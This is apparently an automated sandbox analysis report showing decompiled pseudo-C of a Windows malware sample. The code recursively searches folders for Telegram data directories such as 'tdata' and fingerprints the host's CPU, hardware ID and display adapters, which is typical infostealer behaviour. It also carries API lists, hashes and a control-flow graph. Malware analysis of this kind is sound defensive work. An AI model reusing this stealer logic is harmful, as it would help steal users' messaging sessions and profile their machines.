                                                  										if(_t430 != 0x141f21c1) {
                                                  											__eflags = _t430 - 0x6831c465;
                                                  											if(_t430 != 0x6831c465) {
                                                  												__eflags = _t430 - 0xbe7c0422;
                                                  												if(_t430 != 0xbe7c0422) {
                                                  													__eflags = _t430 - 0x19079238;
                                                  													if(__eflags != 0) {
                                                  														__eflags = _t430 - 0xcd9ab43c;
                                                  														if(_t430 != 0xcd9ab43c) {
                                                  															__eflags = _t430 - 0x21b1b4ad;
                                                  															if(_t430 == 0x21b1b4ad) {
                                                  																L81:
                                                  																_v140 = _v140 & 0x00000000;
                                                  																_v16 = _v16 & 0x00000000;
                                                  																_v144 = 0x18d008be;
                                                  																_t429 = E00404068( &_v144, _t422,  &_v16);
                                                  																__eflags = _t429;
                                                  																if(_t429 == 0) {
                                                  																	L37:
                                                  																	E0040351E(_t429);
                                                  																	goto L18;
                                                  																}
                                                  																_t245 = E00403713(_t429, _t422);
                                                  																__eflags = _t245;
                                                  																if(_t245 == 0) {
                                                  																	goto L37;
                                                  																}
                                                  																_push(0);
                                                  																_t391 = _t422;
                                                  																L35:
                                                  																__eflags = _a4;
                                                  																_push( &_v96);
                                                  																_t350 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
                                                  																__eflags = _t350;
                                                  																_push(_t350 & 0x0000ffff);
                                                  																E00403EAA(_t277, _t391, _t350);
                                                  																_t433 = _t433 + 0xc;
                                                  																L36:
                                                  																 *0x4084ca =  *0x4084ca + 1;
                                                  																__eflags =  *0x4084ca;
                                                  																goto L37;
                                                  															}
                                                  															__eflags = _t430 - 0xdf87581d;
                                                  															if(_t430 == 0xdf87581d) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x84355a31;
                                                  															if(_t430 == 0x84355a31) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0xbe0fa81d;
                                                  															if(_t430 == 0xbe0fa81d) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x2bc5986f;
                                                  															if(_t430 == 0x2bc5986f) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x7d0d23c0;
                                                  															if(_t430 == 0x7d0d23c0) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x1f654090;
                                                  															if(_t430 == 0x1f654090) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0xdf079535;
                                                  															if(_t430 == 0xdf079535) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x4135d5fc;
                                                  															if(_t430 == 0x4135d5fc) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x6e81e3ce;
                                                  															if(_t430 == 0x6e81e3ce) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x724ce424;
                                                  															if(_t430 == 0x724ce424) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x8764d8e1;
                                                  															if(_t430 == 0x8764d8e1) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x6b80d435;
                                                  															if(_t430 == 0x6b80d435) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x29244fc;
                                                  															if(_t430 == 0x29244fc) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x53c2254f;
                                                  															if(_t430 == 0x53c2254f) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0xc29e566f;
                                                  															if(_t430 == 0xc29e566f) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x2acb08f2;
                                                  															if(_t430 == 0x2acb08f2) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0xa583b0fd;
                                                  															if(_t430 == 0xa583b0fd) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x61a97737;
                                                  															if(_t430 == 0x61a97737) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x3af7e50b;
                                                  															if(_t430 == 0x3af7e50b) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0xcd7ced7f;
                                                  															if(_t430 == 0xcd7ced7f) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x64febc18;
                                                  															if(_t430 == 0x64febc18) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x66177b21;
                                                  															if(_t430 == 0x66177b21) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0xa09997a2;
                                                  															if(_t430 == 0xa09997a2) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0x4d97bd74;
                                                  															if(_t430 == 0x4d97bd74) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0xf1153a3a;
                                                  															if(_t430 == 0xf1153a3a) {
                                                  																goto L81;
                                                  															}
                                                  															__eflags = _t430 - 0xcce92e05;
                                                  															if(_t430 == 0xcce92e05) {
                                                  																L78:
                                                  																_v132 = _v132 & 0x00000000;
                                                  																_v16 = _v16 & 0x00000000;
                                                  																_v136 = 0x18d008be;
                                                  																_t429 = E00404068( &_v136, _t422,  &_v16);
                                                  																__eflags = _t429;
                                                  																if(_t429 != 0) {
                                                  																	_t252 = E00403713(_t429, _t422);
                                                  																	__eflags = _t252;
                                                  																	if(_t252 != 0) {
                                                  																		__eflags = _a4;
                                                  																		_t356 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
                                                  																		_t255 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
                                                  																		E00403EAA(_t277, _t422, _a4, ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff,  &_v260, 0);
                                                  																		_t433 = _t433 + 0xc;
                                                  																		 *0x4084cb =  *0x4084cb + 1;
                                                  																	}
                                                  																}
                                                  																goto L37;
                                                  															}
                                                  															__eflags = _t430 - 0x57e5dfea;
                                                  															if(_t430 == 0x57e5dfea) {
                                                  																goto L78;
                                                  															}
                                                  															__eflags = _t430 - 0xebf178e0;
                                                  															if(_t430 == 0xebf178e0) {
                                                  																goto L78;
                                                  															}
                                                  															__eflags = _t430 - 0x79349ba;
                                                  															if(_t430 == 0x79349ba) {
                                                  																goto L78;
                                                  															}
                                                  															__eflags = _t430 - 0xd26e760f;
                                                  															if(_t430 == 0xd26e760f) {
                                                  																goto L78;
                                                  															}
                                                  															E00401000(_t277, _t422, _a4); // executed
                                                  															goto L18;
                                                  														}
                                                  														_v124 = _v124 & 0x00000000;
                                                  														_t360 =  &_v128;
                                                  														_v128 = 0xbe1ba190;
                                                  														goto L25;
                                                  													} else {
                                                  														_push(1);
                                                  														goto L17;
                                                  													}
                                                  												}
                                                  												_v116 = _v116 & 0x00000000;
                                                  												_v16 = _v16 & 0x00000000;
                                                  												_v120 = 0x211f03d4;
                                                  												_t429 = E00404068( &_v120, _t422,  &_v16);
                                                  												__eflags = _t429;
                                                  												if(_t429 == 0) {
                                                  													goto L37;
                                                  												}
                                                  												_t273 = E00403713(_t429, _t422);
                                                  												__eflags = _t273;
                                                  												if(_t273 == 0) {
                                                  													goto L37;
                                                  												} else {
                                                  													_push(1);
                                                  													L34:
                                                  													_t391 = _t429;
                                                  													goto L35;
                                                  												}
                                                  											}
                                                  											_v108 = _v108 & 0x00000000;
                                                  											_v16 = _v16 & 0x00000000;
                                                  											_v112 = 0x2bc65cc5;
                                                  											_t429 = E00404068( &_v112, _t422,  &_v16);
                                                  											__eflags = _t429;
                                                  											if(_t429 == 0) {
                                                  												goto L37;
                                                  											}
                                                  											_t276 = E00403713(_t429, _t422);
                                                  											__eflags = _t276;
                                                  											if(_t276 == 0) {
                                                  												goto L37;
                                                  											} else {
                                                  												_push(0);
                                                  												goto L34;
                                                  											}
                                                  										} else {
                                                  											_t53 =  &_v100;
                                                  											 *_t53 = _v100 & 0x00000000;
                                                  											__eflags =  *_t53;
                                                  											_t360 =  &_v104;
                                                  											_v104 = 0x4dae58fd;
                                                  											L25:
                                                  											_v16 = _v16 & 0x00000000;
                                                  											_t278 = E00404068(_t360, _t422,  &_v16);
                                                  											__eflags = _t278;
                                                  											if(_t278 == 0) {
                                                  												L29:
                                                  												E0040351E(_t278);
                                                  												_t277 = _v20;
                                                  												goto L18;
                                                  											}
                                                  											_t260 = E00403713(_t278, _t422);
                                                  											__eflags = _t260;
                                                  											if(_t260 != 0) {
                                                  												_t427 = E004034F0(0x208);
                                                  												__eflags = _a4;
                                                  												_v84 = 0;
                                                  												_t399 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
                                                  												_t365 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
                                                  												_push(_t278 + (( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff) * 2);
                                                  												E004035E8(__eflags, _t261, L"%s%s",  &_v96);
                                                  												_t265 = 0x2f;
                                                  												_v84 = _t265;
                                                  												E00403E66(_v20, _t278, __eflags, _t427);
                                                  												_t433 = _t433 + 0x14;
                                                  												 *0x4084ca =  *0x4084ca + 1;
                                                  												__eflags =  *0x4084ca;
                                                  												L28:
                                                  												E0040351E(_t427);
                                                  											}
                                                  											goto L29;
                                                  										}
                                                  									} else {
                                                  										_push(0);
                                                  										L17:
                                                  										_push( &_v96);
                                                  										_t369 =  !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff;
                                                  										_t269 = ( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff;
                                                  										_push(( !=  ?  *0x4084d0 & 0x0000ffff :  *0x4084f0 & 0x0000ffff) & 0x0000ffff);
                                                  										E00403EAA(_t277, _t422, _a4);
                                                  										_t433 = _t433 + 0xc;
                                                  										 *0x4084ca =  *0x4084ca + 1;
                                                  										goto L18;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  						L19:
                                                  						_t193 = FindNextFileW(_v44,  &_v856); // executed
                                                  					} while (_t193 != 0);
                                                  					goto L20;
                                                  				}
                                                  			}

                                                  0x00401429
                                                  0x0040142b
                                                  0x00000000
                                                  0x00000000
                                                  0x00401431
                                                  0x00401436
                                                  0x00401438
                                                  0x00000000
                                                  0x0040143a
                                                  0x0040143a
                                                  0x004013c6
                                                  0x004013c6
                                                  0x00000000
                                                  0x004013c6
                                                  0x00401438
                                                  0x00401393
                                                  0x0040139a
                                                  0x004013a4
                                                  0x004013b0
                                                  0x004013b3
                                                  0x004013b5
                                                  0x00000000
                                                  0x00000000
                                                  0x004013bb
                                                  0x004013c0
                                                  0x004013c2
                                                  0x00000000
                                                  0x004013c4
                                                  0x004013c4
                                                  0x00000000
                                                  0x004013c4
                                                  0x004012ed
                                                  0x004012ed
                                                  0x004012ed
                                                  0x004012ed
                                                  0x004012f1
                                                  0x004012f4
                                                  0x004012fb
                                                  0x004012fb
                                                  0x0040130a
                                                  0x0040130d
                                                  0x0040130f
                                                  0x0040137c
                                                  0x0040137e
                                                  0x00401383
                                                  0x00000000
                                                  0x00401383
                                                  0x00401315
                                                  0x0040131a
                                                  0x0040131c
                                                  0x0040132f
                                                  0x0040133a
                                                  0x0040133d
                                                  0x00401344
                                                  0x00401347
                                                  0x0040134d
                                                  0x00401355
                                                  0x00401361
                                                  0x00401363
                                                  0x00401367
                                                  0x0040136c
                                                  0x0040136f
                                                  0x0040136f
                                                  0x00401375
                                                  0x00401377
                                                  0x00401377
                                                  0x00000000
                                                  0x0040131c
                                                  0x00401251
                                                  0x00401251
                                                  0x00401253
                                                  0x00401263
                                                  0x0040126b
                                                  0x0040126e
                                                  0x00401273
                                                  0x00401274
                                                  0x00401279
                                                  0x0040127c
                                                  0x00000000
                                                  0x0040127c
                                                  0x0040124b
                                                  0x00401233
                                                  0x0040120f
                                                  0x00401285
                                                  0x0040128f
                                                  0x00401295
                                                  0x00000000
                                                  0x00401173

                                                  APIs
                                                  • FindNextFileW.KERNELBASE(?,?), ref: 0040128F
                                                    • Part of subcall function 0040402B: GetFileAttributesW.KERNELBASE(00F7E960,00401035,00F7E960), ref: 0040402C
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • FindFirstFileW.KERNELBASE(00000000,?,00F7E960), ref: 00401161
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 004016A3
                                                  • LeaveCriticalSection.KERNEL32(004084D4), ref: 004016BC
                                                    • Part of subcall function 00403EAA: FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00403F0B
                                                    • Part of subcall function 00403EAA: FindNextFileW.KERNEL32(0040174B,?), ref: 00403FAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: File$CriticalFindSection$EnterFirstHeapLeaveNext$AllocateAttributesProcess
                                                  • String ID: $Lr$%s%s$%s\%s$%s\*$7a?=$Telegram
                                                  • API String ID: 1893179121-1537637304
                                                  • Opcode ID: fbf9d546b1d350cf1b97443c6fed3c3a637025945fa54ff0eb627fb59bd648e8
                                                  • Instruction ID: 38905c5577f4f7158907a1bc769050883fc1a5bf4532517a01263020584b9d64
                                                  • Opcode Fuzzy Hash: fbf9d546b1d350cf1b97443c6fed3c3a637025945fa54ff0eb627fb59bd648e8
                                                  • Instruction Fuzzy Hash: 71320771E0021597DB24ABA58C517BEB7B89F54314F18407FE806B72F1EB7C4E848B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 96%
                                                  			E00404ABC(void* __ecx, void* __edx, char _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				short _v12;
                                                  				short _v14;
                                                  				short _v16;
                                                  				short _v18;
                                                  				short _v20;
                                                  				short _v22;
                                                  				short _v24;
                                                  				short _v26;
                                                  				char _v28;
                                                  				short _v32;
                                                  				short _v34;
                                                  				short _v36;
                                                  				short _v38;
                                                  				short _v40;
                                                  				short _v42;
                                                  				short _v44;
                                                  				short _v46;
                                                  				short _v48;
                                                  				short _v50;
                                                  				short _v52;
                                                  				short _v54;
                                                  				short _v56;
                                                  				short _v58;
                                                  				char _v60;
                                                  				short _v62;
                                                  				short _v64;
                                                  				short _v66;
                                                  				short _v68;
                                                  				short _v70;
                                                  				short _v72;
                                                  				short _v74;
                                                  				short _v76;
                                                  				short _v78;
                                                  				short _v80;
                                                  				short _v82;
                                                  				short _v84;
                                                  				short _v86;
                                                  				short _v88;
                                                  				short _v90;
                                                  				short _v92;
                                                  				short _v94;
                                                  				short _v96;
                                                  				short _v98;
                                                  				char _v100;
                                                  				void* _v104;
                                                  				struct _WIN32_FIND_DATAW _v700;
                                                  				short _t92;
                                                  				void* _t97;
                                                  				void* _t99;
                                                  				signed int _t102;
                                                  				int _t104;
                                                  				short _t105;
                                                  				short _t106;
                                                  				short _t107;
                                                  				short _t108;
                                                  				short _t109;
                                                  				short _t110;
                                                  				short _t116;
                                                  				short _t117;
                                                  				short _t123;
                                                  				short _t124;
                                                  				short _t125;
                                                  				short _t126;
                                                  				short _t127;
                                                  				signed int _t129;
                                                  				void* _t138;
                                                  				short _t141;
                                                  				short _t142;
                                                  				void* _t146;
                                                  				void* _t147;
                                                  				short _t149;
                                                  				short _t155;
                                                  				short _t168;
                                                  				short _t169;
                                                  				short _t170;
                                                  				short _t171;
                                                  				short _t175;
                                                  				short _t176;
                                                  				short _t177;
                                                  				short _t183;
                                                  				short _t185;
                                                  				short _t186;
                                                  				short _t187;
                                                  				short _t189;
                                                  				short _t190;
                                                  				short _t191;
                                                  				short _t192;
                                                  				short _t193;
                                                  				void* _t199;
                                                  				short _t200;
                                                  				WCHAR* _t202;
                                                  				void* _t203;
                                                  				void* _t204;
                                                  				void* _t205;
                                                  				intOrPtr _t209;
                                                  
                                                  				_t207 = _a4 - 1;
                                                  				_t200 = 0x25;
                                                  				_t92 = 0x73;
                                                  				_t199 = __edx;
                                                  				_t147 = __ecx;
                                                  				_t183 = 0x74;
                                                  				_t149 = 0x61;
                                                  				if(_a4 != 1) {
                                                  					L3:
                                                  					 *0x4080bc =  *0x4080bc + 1;
                                                  					_v8 = E004034F0(0x208);
                                                  					_t202 = E004034F0(0x208);
                                                  					E004035E8(_t209, _t202, L"%s\\*", _t199);
                                                  					_t205 = _t204 + 0xc;
                                                  					_t97 = FindFirstFileW(_t202,  &_v700); // executed
                                                  					_v104 = _t97;
                                                  					_t210 = _t97 - 0xffffffff;
                                                  					if(_t97 == 0xffffffff) {
                                                  						L18:
                                                  						E0040351E(_t202);
                                                  						_t99 = E0040351E(_v8);
                                                  						 *0x4080bc =  *0x4080bc - 1;
                                                  						return _t99;
                                                  					} else {
                                                  						goto L4;
                                                  					}
                                                  					do {
                                                  						L4:
                                                  						_push( &(_v700.cFileName));
                                                  						E004035E8(_t210, _t202, L"%s\\%s", _t199);
                                                  						_t205 = _t205 + 0x10;
                                                  						if(_a4 != 0) {
                                                  							_t102 = E00403623( &(_v700.cFileName));
                                                  							_t155 = 0x73;
                                                  							__eflags =  *((intOrPtr*)(_t203 + _t102 * 2 - 0x28e)) - _t155;
                                                  							if(__eflags != 0) {
                                                  								goto L17;
                                                  							}
                                                  							_t105 = 0x25;
                                                  							_v60 = _t105;
                                                  							_t106 = 0x5c;
                                                  							_t185 = 0x74;
                                                  							_v56 = _t106;
                                                  							_t107 = 0x64;
                                                  							_v52 = _t107;
                                                  							_t108 = 0x61;
                                                  							_v50 = _t108;
                                                  							_v46 = _t108;
                                                  							_t109 = 0x5f;
                                                  							_v44 = _t109;
                                                  							_t110 = 0x25;
                                                  							_v54 = _t185;
                                                  							_v48 = _t185;
                                                  							_t186 = 0x64;
                                                  							_v42 = _t110;
                                                  							_v36 = _t110;
                                                  							_v32 = 0;
                                                  							_v40 = _t186;
                                                  							_t187 = 0x5c;
                                                  							_push( &(_v700.cFileName));
                                                  							_push( *0x4080b8);
                                                  							_v58 = _t155;
                                                  							_v38 = _t187;
                                                  							_v34 = _t155;
                                                  							E004035E8(__eflags, _v8,  &_v60, _a8);
                                                  							E00403E66(_t147, _t202, __eflags, _v8);
                                                  							_t116 = 0x25;
                                                  							_v28 = _t116;
                                                  							_t117 = 0x73;
                                                  							_t168 = 0x5c;
                                                  							_v24 = _t168;
                                                  							_t169 = 0x6d;
                                                  							_v22 = _t169;
                                                  							_t170 = 0x61;
                                                  							_v20 = _t170;
                                                  							_t171 = 0x70;
                                                  							_v26 = _t117;
                                                  							_v16 = _t117;
                                                  							_v18 = _t171;
                                                  							_v14 = 0;
                                                  							 *((short*)(_t202 + E00403623(_t202) * 2 - 2)) = 0;
                                                  							E004035E8(__eflags, _t202,  &_v28, _t202);
                                                  							_t205 = _t205 + 0x20;
                                                  							__eflags = E0040402B(_t202);
                                                  							if(__eflags == 0) {
                                                  								goto L17;
                                                  							}
                                                  							_t123 = 0x25;
                                                  							_v100 = _t123;
                                                  							_t124 = 0x73;
                                                  							_t175 = 0x5c;
                                                  							_t189 = 0x74;
                                                  							_v98 = _t124;
                                                  							_t125 = 0x64;
                                                  							_v96 = _t175;
                                                  							_t176 = 0x61;
                                                  							_v94 = _t189;
                                                  							_v88 = _t189;
                                                  							_t190 = 0x5f;
                                                  							_v84 = _t190;
                                                  							_t191 = 0x25;
                                                  							_v92 = _t125;
                                                  							_v80 = _t125;
                                                  							_t126 = 0x5c;
                                                  							_v78 = _t126;
                                                  							_t127 = 0x73;
                                                  							_v82 = _t191;
                                                  							_v76 = _t191;
                                                  							_t192 = 0x5c;
                                                  							_v72 = _t192;
                                                  							_t193 = 0x6d;
                                                  							_v90 = _t176;
                                                  							_v86 = _t176;
                                                  							_v68 = _t176;
                                                  							_t177 = 0x70;
                                                  							_v74 = _t127;
                                                  							_v64 = _t127;
                                                  							_v66 = _t177;
                                                  							_v70 = _t193;
                                                  							_v62 = 0;
                                                  							_t129 = E00403623( &(_v700.cFileName));
                                                  							__eflags = 0;
                                                  							 *((short*)(_t203 + _t129 * 2 - 0x28e)) = 0;
                                                  							_push( &(_v700.cFileName));
                                                  							_push( *0x4080b8);
                                                  							E004035E8(0, _v8,  &_v100, _a8);
                                                  							_t205 = _t205 + 0x14;
                                                  							E00403E66(_t147, _t202, __eflags, _v8);
                                                  							L16:
                                                  							goto L17;
                                                  						}
                                                  						if((_v700.dwFileAttributes & 0x00000010) != 0 && E00403713( &(_v700.cFileName), L"..") != 0 && E00403713( &(_v700.cFileName), ".") != 0) {
                                                  							_t138 = E00403B10( &(_v700.cFileName), E00403623( &(_v700.cFileName)) + _t136);
                                                  							if(_t138 == 0x23f2e218 || _t138 == 0x2d3640ab) {
                                                  								EnterCriticalSection(0x4084d4);
                                                  								E00404ABC(_t147, _t202, 1, L"Telegram");
                                                  								LeaveCriticalSection(0x4084d4);
                                                  								goto L17;
                                                  							} else {
                                                  								if( *0x4080bc > 2) {
                                                  									goto L17;
                                                  								}
                                                  								E00404ABC(_t147, _t202, 0, 0); // executed
                                                  								goto L16;
                                                  							}
                                                  						}
                                                  						L17:
                                                  						_t104 = FindNextFileW(_v104,  &_v700); // executed
                                                  					} while (_t104 != 0);
                                                  					goto L18;
                                                  				}
                                                  				_v26 = _t92;
                                                  				_t141 = 0x5c;
                                                  				_v24 = _t141;
                                                  				_t142 = 0x64;
                                                  				_v20 = _t142;
                                                  				_v12 = 0;
                                                  				_v28 = _t200;
                                                  				_v22 = _t183;
                                                  				_v18 = _t149;
                                                  				_v16 = _t183;
                                                  				_v14 = _t149;
                                                  				E004035E8(_t207, __edx,  &_v28, __edx);
                                                  				_t204 = _t204 + 0xc;
                                                  				_t146 = E0040402B(__edx);
                                                  				if(_t146 != 0) {
                                                  					 *0x4080b8 =  *0x4080b8 + 1;
                                                  					_t209 =  *0x4080b8;
                                                  					goto L3;
                                                  				}
                                                  				return _t146;
                                                  			}

                                                  0x00404cc6
                                                  0x00404cce
                                                  0x00404cd2
                                                  0x00404ce1
                                                  0x00404ce9
                                                  0x00404cec
                                                  0x00404cf0
                                                  0x00404cf3
                                                  0x00404cf6
                                                  0x00404cfa
                                                  0x00404cfb
                                                  0x00404d01
                                                  0x00404d02
                                                  0x00404d08
                                                  0x00404d09
                                                  0x00404d0d
                                                  0x00404d13
                                                  0x00404d19
                                                  0x00404d25
                                                  0x00404d2f
                                                  0x00404d34
                                                  0x00404d3e
                                                  0x00404d40
                                                  0x00000000
                                                  0x00000000
                                                  0x00404d48
                                                  0x00404d4b
                                                  0x00404d4f
                                                  0x00404d52
                                                  0x00404d55
                                                  0x00404d58
                                                  0x00404d5c
                                                  0x00404d5f
                                                  0x00404d63
                                                  0x00404d66
                                                  0x00404d6a
                                                  0x00404d6e
                                                  0x00404d71
                                                  0x00404d75
                                                  0x00404d78
                                                  0x00404d7c
                                                  0x00404d80
                                                  0x00404d83
                                                  0x00404d87
                                                  0x00404d8a
                                                  0x00404d8e
                                                  0x00404d92
                                                  0x00404d95
                                                  0x00404d99
                                                  0x00404d9a
                                                  0x00404d9e
                                                  0x00404da2
                                                  0x00404da8
                                                  0x00404da9
                                                  0x00404dad
                                                  0x00404db3
                                                  0x00404dbd
                                                  0x00404dc1
                                                  0x00404dc5
                                                  0x00404dca
                                                  0x00404dcc
                                                  0x00404dda
                                                  0x00404ddb
                                                  0x00404deb
                                                  0x00404df0
                                                  0x00404dfa
                                                  0x00404dff
                                                  0x00000000
                                                  0x00404dff
                                                  0x00404b9b
                                                  0x00404be6
                                                  0x00404bf0
                                                  0x00404c1e
                                                  0x00404c2f
                                                  0x00404c3b
                                                  0x00000000
                                                  0x00404bf9
                                                  0x00404c00
                                                  0x00000000
                                                  0x00000000
                                                  0x00404c0e
                                                  0x00000000
                                                  0x00404c13
                                                  0x00404bf0
                                                  0x00404e00
                                                  0x00404e0a
                                                  0x00404e10
                                                  0x00000000
                                                  0x00404b74
                                                  0x00404ae0
                                                  0x00404ae4
                                                  0x00404ae7
                                                  0x00404aeb
                                                  0x00404aec
                                                  0x00404af2
                                                  0x00404afc
                                                  0x00404b00
                                                  0x00404b04
                                                  0x00404b08
                                                  0x00404b0c
                                                  0x00404b10
                                                  0x00404b15
                                                  0x00404b1a
                                                  0x00404b21
                                                  0x00404b27
                                                  0x00404b27
                                                  0x00000000
                                                  0x00404b27
                                                  0x00404e33

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,004084D4,?), ref: 00404B62
                                                  • EnterCriticalSection.KERNEL32(004084D4), ref: 00404C1E
                                                    • Part of subcall function 00404ABC: LeaveCriticalSection.KERNEL32(004084D4), ref: 00404C3B
                                                  • FindNextFileW.KERNELBASE(?,?), ref: 00404E0A
                                                    • Part of subcall function 0040402B: GetFileAttributesW.KERNELBASE(00F7E960,00401035,00F7E960), ref: 0040402C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: File$CriticalFindSection$AttributesEnterFirstLeaveNext
                                                  • String ID: %s\%s$%s\*$Telegram
                                                  • API String ID: 648860119-4994844
                                                  • Opcode ID: 1f8b838a5c4e27d725b3d0cebc7bbf837a7a7b2244d331cf3ba931f53252c21b
                                                  • Instruction ID: 46fb50b973a3c0d7301f33b4d2055fb4458c929e1c6fe611921c87e6bd73fcb7
                                                  • Opcode Fuzzy Hash: 1f8b838a5c4e27d725b3d0cebc7bbf837a7a7b2244d331cf3ba931f53252c21b
                                                  • Instruction Fuzzy Hash: D2A18325A14308A9EF10DBA0ED06BBE7775EF84710F20543FE504BB2E0EBB51A85879D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph (interactive in the original report; node colour marks Executed vs. Not Executed basic blocks). Exported edge list below, in the form "id start-end [call target] source->successor":
                                                  control_flow_graph 502 40202a-40207b call 4034f0 505 4020d9-4020e6 GetCurrentHwProfileA 502->505 506 40207d-40209c 502->506 507 4020e8-4020f9 call 4035c3 505->507 508 4020fc-40213b GetSystemInfo call 4035c3 call 40351e 505->508 509 4020a4-4020aa 506->509 510 40209e-4020a2 506->510 507->508 524 402178-402189 EnumDisplayDevicesA 508->524 514 4020b5-4020bb 509->514 515 4020ac-4020b3 509->515 513 4020c4-4020cf call 403533 510->513 519 4020d2-4020d7 513->519 514->519 520 4020bd-4020c1 514->520 515->513 519->505 519->506 520->513 525 40218b-402191 524->525 526 40213d-402146 524->526 527 402167-402177 526->527 528 402148-402164 call 4035c3 526->528 527->524 528->527
                                                  C-Code - Quality: 59%
                                                  			E0040202A(char* __edx) {
                                                  				char _v392;
                                                  				char _v428;
                                                  				struct tagHW_PROFILE_INFOA _v556;
                                                  				struct _SYSTEM_INFO _v592;
                                                  				char _v608;
                                                  				intOrPtr _v612;
                                                  				intOrPtr _v616;
                                                  				char _t32;
                                                  				int _t34;
                                                  				int _t39;
                                                  				char _t40;
                                                  				intOrPtr _t48;
                                                  				intOrPtr* _t50;
                                                  				intOrPtr _t60;
                                                  				char* _t62;
                                                  				intOrPtr _t64;
                                                  				void* _t66;
                                                  				void* _t70;
                                                  				intOrPtr* _t72;
                                                  				signed int _t73;
                                                  				void* _t75;
                                                  				void* _t76;
                                                  
                                                  				// Host fingerprinting: collects the CPUID brand string, the hardware profile GUID (reported as "HWID"),
                                                  				// the processor count and every display adapter, formatting each as a "- key: value" line via E004035C3 (format-string routine).
                                                  				_t62 = __edx;
                                                  				_t75 = (_t73 & 0xfffffff8) - 0x264;
                                                  				asm("movaps xmm0, [0x407520]");
                                                  				_push(_t48);
                                                  				asm("movups [esp+0x14], xmm0");
                                                  				_v616 = E004034F0(0x100); // heap-allocate 0x100 bytes for the CPU brand string (allocator wrapper, see APIs below)
                                                  				_t64 = 0x80000000;
                                                  				_push(_t48);
                                                  				asm("cpuid"); // leaf 0x80000000: eax returns the highest supported extended leaf
                                                  				_t50 =  &_v608; // _v608 receives eax, ebx, ecx, edx in that order (16 bytes)
                                                  				 *_t50 = 0x80000000;
                                                  				 *((intOrPtr*)(_t50 + 4)) = _t48;
                                                  				 *((intOrPtr*)(_t50 + 8)) = 0;
                                                  				 *((intOrPtr*)(_t50 + 0xc)) = __edx;
                                                  				_t32 = _v608;
                                                  				_v612 = _t32; // highest extended leaf
                                                  				if(_t32 >= 0x80000000) {
                                                  					// Loop over leaves 0x80000000..max. Leaves 0x80000002, 0x80000003 and 0x80000004 each return
                                                  					// 16 bytes of the 48-byte processor brand string; they are copied to the buffer at +0, +0x10 and +0x20.
                                                  					do {
                                                  						_push(_t50);
                                                  						asm("cpuid");
                                                  						_t72 = _t50;
                                                  						_t50 =  &_v608;
                                                  						 *_t50 = _t64;
                                                  						 *((intOrPtr*)(_t50 + 4)) = _t72;
